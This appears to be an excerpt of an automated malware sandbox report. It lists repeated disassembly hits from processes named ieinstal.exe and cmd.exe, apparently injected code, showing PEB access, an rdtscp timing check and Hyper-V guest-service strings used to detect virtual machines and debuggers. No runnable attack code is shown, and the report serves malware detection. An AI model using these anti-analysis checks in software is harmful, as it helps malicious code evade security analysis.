Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ieinstal.exe, 0000000D.00000002.531352256.000000000848A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 13_2_22736A60 rdtscp

13_2_22736A60

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_3_22564830 mov eax, dword ptr fs:[00000030h]	13_3_22564830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2272AE73 mov eax, dword ptr fs:[00000030h]	13_2_2272AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2272AE73 mov eax, dword ptr fs:[00000030h]	13_2_2272AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2272AE73 mov eax, dword ptr fs:[00000030h]	13_2_2272AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2272AE73 mov eax, dword ptr fs:[00000030h]	13_2_2272AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2272AE73 mov eax, dword ptr fs:[00000030h]	13_2_2272AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2274927A mov eax, dword ptr fs:[00000030h]	13_2_2274927A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227BB260 mov eax, dword ptr fs:[00000030h]	13_2_227BB260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227BB260 mov eax, dword ptr fs:[00000030h]	13_2_227BB260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2271766D mov eax, dword ptr fs:[00000030h]	13_2_2271766D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D8A62 mov eax, dword ptr fs:[00000030h]	13_2_227D8A62
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22794257 mov eax, dword ptr fs:[00000030h]	13_2_22794257
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22709240 mov eax, dword ptr fs:[00000030h]	13_2_22709240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22709240 mov eax, dword ptr fs:[00000030h]	13_2_22709240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22709240 mov eax, dword ptr fs:[00000030h]	13_2_22709240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22709240 mov eax, dword ptr fs:[00000030h]	13_2_22709240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22717E41 mov eax, dword ptr fs:[00000030h]	13_2_22717E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227BFE3F mov eax, dword ptr fs:[00000030h]	13_2_227BFE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270E620 mov eax, dword ptr fs:[00000030h]	13_2_2270E620
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22744A2C mov eax, dword ptr fs:[00000030h]	13_2_22744A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22744A2C mov eax, dword ptr fs:[00000030h]	13_2_22744A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22705210 mov eax, dword ptr fs:[00000030h]	13_2_22705210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22705210 mov ecx, dword ptr fs:[00000030h]	13_2_22705210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22705210 mov eax, dword ptr fs:[00000030h]	13_2_22705210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22705210 mov eax, dword ptr fs:[00000030h]	13_2_22705210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270AA16 mov eax, dword ptr fs:[00000030h]	13_2_2270AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270AA16 mov eax, dword ptr fs:[00000030h]	13_2_2270AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22723A1C mov eax, dword ptr fs:[00000030h]	13_2_22723A1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2273A61C mov eax, dword ptr fs:[00000030h]	13_2_2273A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2273A61C mov eax, dword ptr fs:[00000030h]	13_2_2273A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270C600 mov eax, dword ptr fs:[00000030h]	13_2_2270C600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270C600 mov eax, dword ptr fs:[00000030h]	13_2_2270C600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270C600 mov eax, dword ptr fs:[00000030h]	13_2_2270C600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22738E00 mov eax, dword ptr fs:[00000030h]	13_2_22738E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227C1608 mov eax, dword ptr fs:[00000030h]	13_2_227C1608
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22718A0A mov eax, dword ptr fs:[00000030h]	13_2_22718A0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227316E0 mov ecx, dword ptr fs:[00000030h]	13_2_227316E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227176E2 mov eax, dword ptr fs:[00000030h]	13_2_227176E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22732AE4 mov eax, dword ptr fs:[00000030h]	13_2_22732AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D8ED6 mov eax, dword ptr fs:[00000030h]	13_2_227D8ED6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22748EC7 mov eax, dword ptr fs:[00000030h]	13_2_22748EC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22732ACB mov eax, dword ptr fs:[00000030h]	13_2_22732ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227BFEC0 mov eax, dword ptr fs:[00000030h]	13_2_227BFEC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227336CC mov eax, dword ptr fs:[00000030h]	13_2_227336CC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2271AAB0 mov eax, dword ptr fs:[00000030h]	13_2_2271AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2271AAB0 mov eax, dword ptr fs:[00000030h]	13_2_2271AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2273FAB0 mov eax, dword ptr fs:[00000030h]	13_2_2273FAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227052A5 mov eax, dword ptr fs:[00000030h]	13_2_227052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227052A5 mov eax, dword ptr fs:[00000030h]	13_2_227052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227052A5 mov eax, dword ptr fs:[00000030h]	13_2_227052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227052A5 mov eax, dword ptr fs:[00000030h]	13_2_227052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227052A5 mov eax, dword ptr fs:[00000030h]	13_2_227052A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D0EA5 mov eax, dword ptr fs:[00000030h]	13_2_227D0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D0EA5 mov eax, dword ptr fs:[00000030h]	13_2_227D0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D0EA5 mov eax, dword ptr fs:[00000030h]	13_2_227D0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227846A7 mov eax, dword ptr fs:[00000030h]	13_2_227846A7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2273D294 mov eax, dword ptr fs:[00000030h]	13_2_2273D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2273D294 mov eax, dword ptr fs:[00000030h]	13_2_2273D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2279FE87 mov eax, dword ptr fs:[00000030h]	13_2_2279FE87
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22733B7A mov eax, dword ptr fs:[00000030h]	13_2_22733B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_22733B7A mov eax, dword ptr fs:[00000030h]	13_2_22733B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270DB60 mov ecx, dword ptr fs:[00000030h]	13_2_2270DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2271FF60 mov eax, dword ptr fs:[00000030h]	13_2_2271FF60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D8F6A mov eax, dword ptr fs:[00000030h]	13_2_227D8F6A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_227D8B58 mov eax, dword ptr fs:[00000030h]	13_2_227D8B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270F358 mov eax, dword ptr fs:[00000030h]	13_2_2270F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2270DB40 mov eax, dword ptr fs:[00000030h]	13_2_2270DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_2271EF40 mov eax, dword ptr fs:[00000030h]	13_2_2271EF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A070D mov eax, dword ptr fs:[00000030h]	17_2_030A070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A070D mov eax, dword ptr fs:[00000030h]	17_2_030A070D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A70E mov eax, dword ptr fs:[00000030h]	17_2_0300A70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A70E mov eax, dword ptr fs:[00000030h]	17_2_0300A70E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0309131B mov eax, dword ptr fs:[00000030h]	17_2_0309131B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306FF10 mov eax, dword ptr fs:[00000030h]	17_2_0306FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306FF10 mov eax, dword ptr fs:[00000030h]	17_2_0306FF10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE76E2 mov eax, dword ptr fs:[00000030h]	17_2_02FE76E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300E730 mov eax, dword ptr fs:[00000030h]	17_2_0300E730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEAAB0 mov eax, dword ptr fs:[00000030h]	17_2_02FEAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEAAB0 mov eax, dword ptr fs:[00000030h]	17_2_02FEAAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8B58 mov eax, dword ptr fs:[00000030h]	17_2_030A8B58
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD52A5 mov eax, dword ptr fs:[00000030h]	17_2_02FD52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD52A5 mov eax, dword ptr fs:[00000030h]	17_2_02FD52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD52A5 mov eax, dword ptr fs:[00000030h]	17_2_02FD52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD52A5 mov eax, dword ptr fs:[00000030h]	17_2_02FD52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD52A5 mov eax, dword ptr fs:[00000030h]	17_2_02FD52A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8F6A mov eax, dword ptr fs:[00000030h]	17_2_030A8F6A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03003B7A mov eax, dword ptr fs:[00000030h]	17_2_03003B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03003B7A mov eax, dword ptr fs:[00000030h]	17_2_03003B7A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0309138A mov eax, dword ptr fs:[00000030h]	17_2_0309138A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0308D380 mov ecx, dword ptr fs:[00000030h]	17_2_0308D380
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFAE73 mov eax, dword ptr fs:[00000030h]	17_2_02FFAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFAE73 mov eax, dword ptr fs:[00000030h]	17_2_02FFAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFAE73 mov eax, dword ptr fs:[00000030h]	17_2_02FFAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFAE73 mov eax, dword ptr fs:[00000030h]	17_2_02FFAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFAE73 mov eax, dword ptr fs:[00000030h]	17_2_02FFAE73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300B390 mov eax, dword ptr fs:[00000030h]	17_2_0300B390
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057794 mov eax, dword ptr fs:[00000030h]	17_2_03057794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057794 mov eax, dword ptr fs:[00000030h]	17_2_03057794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03057794 mov eax, dword ptr fs:[00000030h]	17_2_03057794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE766D mov eax, dword ptr fs:[00000030h]	17_2_02FE766D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002397 mov eax, dword ptr fs:[00000030h]	17_2_03002397
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004BAD mov eax, dword ptr fs:[00000030h]	17_2_03004BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004BAD mov eax, dword ptr fs:[00000030h]	17_2_03004BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004BAD mov eax, dword ptr fs:[00000030h]	17_2_03004BAD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A5BA5 mov eax, dword ptr fs:[00000030h]	17_2_030A5BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9240 mov eax, dword ptr fs:[00000030h]	17_2_02FD9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9240 mov eax, dword ptr fs:[00000030h]	17_2_02FD9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9240 mov eax, dword ptr fs:[00000030h]	17_2_02FD9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9240 mov eax, dword ptr fs:[00000030h]	17_2_02FD9240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE7E41 mov eax, dword ptr fs:[00000030h]	17_2_02FE7E41
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030553CA mov eax, dword ptr fs:[00000030h]	17_2_030553CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030553CA mov eax, dword ptr fs:[00000030h]	17_2_030553CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDE620 mov eax, dword ptr fs:[00000030h]	17_2_02FDE620
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030003E2 mov eax, dword ptr fs:[00000030h]	17_2_030003E2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF3A1C mov eax, dword ptr fs:[00000030h]	17_2_02FF3A1C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDAA16 mov eax, dword ptr fs:[00000030h]	17_2_02FDAA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDAA16 mov eax, dword ptr fs:[00000030h]	17_2_02FDAA16
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030137F5 mov eax, dword ptr fs:[00000030h]	17_2_030137F5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE8A0A mov eax, dword ptr fs:[00000030h]	17_2_02FE8A0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDC600 mov eax, dword ptr fs:[00000030h]	17_2_02FDC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDC600 mov eax, dword ptr fs:[00000030h]	17_2_02FDC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDC600 mov eax, dword ptr fs:[00000030h]	17_2_02FDC600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03008E00 mov eax, dword ptr fs:[00000030h]	17_2_03008E00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A61C mov eax, dword ptr fs:[00000030h]	17_2_0300A61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A61C mov eax, dword ptr fs:[00000030h]	17_2_0300A61C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03014A2C mov eax, dword ptr fs:[00000030h]	17_2_03014A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03014A2C mov eax, dword ptr fs:[00000030h]	17_2_03014A2C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0308FE3F mov eax, dword ptr fs:[00000030h]	17_2_0308FE3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03064257 mov eax, dword ptr fs:[00000030h]	17_2_03064257
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0308B260 mov eax, dword ptr fs:[00000030h]	17_2_0308B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0308B260 mov eax, dword ptr fs:[00000030h]	17_2_0308B260
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8A62 mov eax, dword ptr fs:[00000030h]	17_2_030A8A62
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE8794 mov eax, dword ptr fs:[00000030h]	17_2_02FE8794
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE1B8F mov eax, dword ptr fs:[00000030h]	17_2_02FE1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE1B8F mov eax, dword ptr fs:[00000030h]	17_2_02FE1B8F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0301927A mov eax, dword ptr fs:[00000030h]	17_2_0301927A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0306FE87 mov eax, dword ptr fs:[00000030h]	17_2_0306FE87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300D294 mov eax, dword ptr fs:[00000030h]	17_2_0300D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300D294 mov eax, dword ptr fs:[00000030h]	17_2_0300D294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDDB60 mov ecx, dword ptr fs:[00000030h]	17_2_02FDDB60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEFF60 mov eax, dword ptr fs:[00000030h]	17_2_02FEFF60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030546A7 mov eax, dword ptr fs:[00000030h]	17_2_030546A7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDF358 mov eax, dword ptr fs:[00000030h]	17_2_02FDF358
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A0EA5 mov eax, dword ptr fs:[00000030h]	17_2_030A0EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A0EA5 mov eax, dword ptr fs:[00000030h]	17_2_030A0EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A0EA5 mov eax, dword ptr fs:[00000030h]	17_2_030A0EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300FAB0 mov eax, dword ptr fs:[00000030h]	17_2_0300FAB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FDDB40 mov eax, dword ptr fs:[00000030h]	17_2_02FDDB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FEEF40 mov eax, dword ptr fs:[00000030h]	17_2_02FEEF40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03018EC7 mov eax, dword ptr fs:[00000030h]	17_2_03018EC7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0308FEC0 mov eax, dword ptr fs:[00000030h]	17_2_0308FEC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002ACB mov eax, dword ptr fs:[00000030h]	17_2_03002ACB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030036CC mov eax, dword ptr fs:[00000030h]	17_2_030036CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD4F2E mov eax, dword ptr fs:[00000030h]	17_2_02FD4F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD4F2E mov eax, dword ptr fs:[00000030h]	17_2_02FD4F2E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8ED6 mov eax, dword ptr fs:[00000030h]	17_2_030A8ED6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030016E0 mov ecx, dword ptr fs:[00000030h]	17_2_030016E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002AE4 mov eax, dword ptr fs:[00000030h]	17_2_03002AE4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FFF716 mov eax, dword ptr fs:[00000030h]	17_2_02FFF716
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD58EC mov eax, dword ptr fs:[00000030h]	17_2_02FD58EC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0305A537 mov eax, dword ptr fs:[00000030h]	17_2_0305A537
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300513A mov eax, dword ptr fs:[00000030h]	17_2_0300513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300513A mov eax, dword ptr fs:[00000030h]	17_2_0300513A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004D3B mov eax, dword ptr fs:[00000030h]	17_2_03004D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004D3B mov eax, dword ptr fs:[00000030h]	17_2_03004D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03004D3B mov eax, dword ptr fs:[00000030h]	17_2_03004D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030A8D34 mov eax, dword ptr fs:[00000030h]	17_2_030A8D34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03013D43 mov eax, dword ptr fs:[00000030h]	17_2_03013D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03053540 mov eax, dword ptr fs:[00000030h]	17_2_03053540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FE849B mov eax, dword ptr fs:[00000030h]	17_2_02FE849B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FD9080 mov eax, dword ptr fs:[00000030h]	17_2_02FD9080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002581 mov eax, dword ptr fs:[00000030h]	17_2_03002581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002581 mov eax, dword ptr fs:[00000030h]	17_2_03002581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002581 mov eax, dword ptr fs:[00000030h]	17_2_03002581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002581 mov eax, dword ptr fs:[00000030h]	17_2_03002581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300A185 mov eax, dword ptr fs:[00000030h]	17_2_0300A185
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03002990 mov eax, dword ptr fs:[00000030h]	17_2_03002990
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF746D mov eax, dword ptr fs:[00000030h]	17_2_02FF746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300FD9B mov eax, dword ptr fs:[00000030h]	17_2_0300FD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_0300FD9B mov eax, dword ptr fs:[00000030h]	17_2_0300FD9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030061A0 mov eax, dword ptr fs:[00000030h]	17_2_030061A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030061A0 mov eax, dword ptr fs:[00000030h]	17_2_030061A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030035A1 mov eax, dword ptr fs:[00000030h]	17_2_030035A1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030569A6 mov eax, dword ptr fs:[00000030h]	17_2_030569A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF0050 mov eax, dword ptr fs:[00000030h]	17_2_02FF0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_02FF0050 mov eax, dword ptr fs:[00000030h]	17_2_02FF0050
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03001DB5 mov eax, dword ptr fs:[00000030h]	17_2_03001DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03001DB5 mov eax, dword ptr fs:[00000030h]	17_2_03001DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_03001DB5 mov eax, dword ptr fs:[00000030h]	17_2_03001DB5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030551BE mov eax, dword ptr fs:[00000030h]	17_2_030551BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030551BE mov eax, dword ptr fs:[00000030h]	17_2_030551BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030551BE mov eax, dword ptr fs:[00000030h]	17_2_030551BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_030551BE mov eax, dword ptr fs:[00000030h]	17_2_030551BE
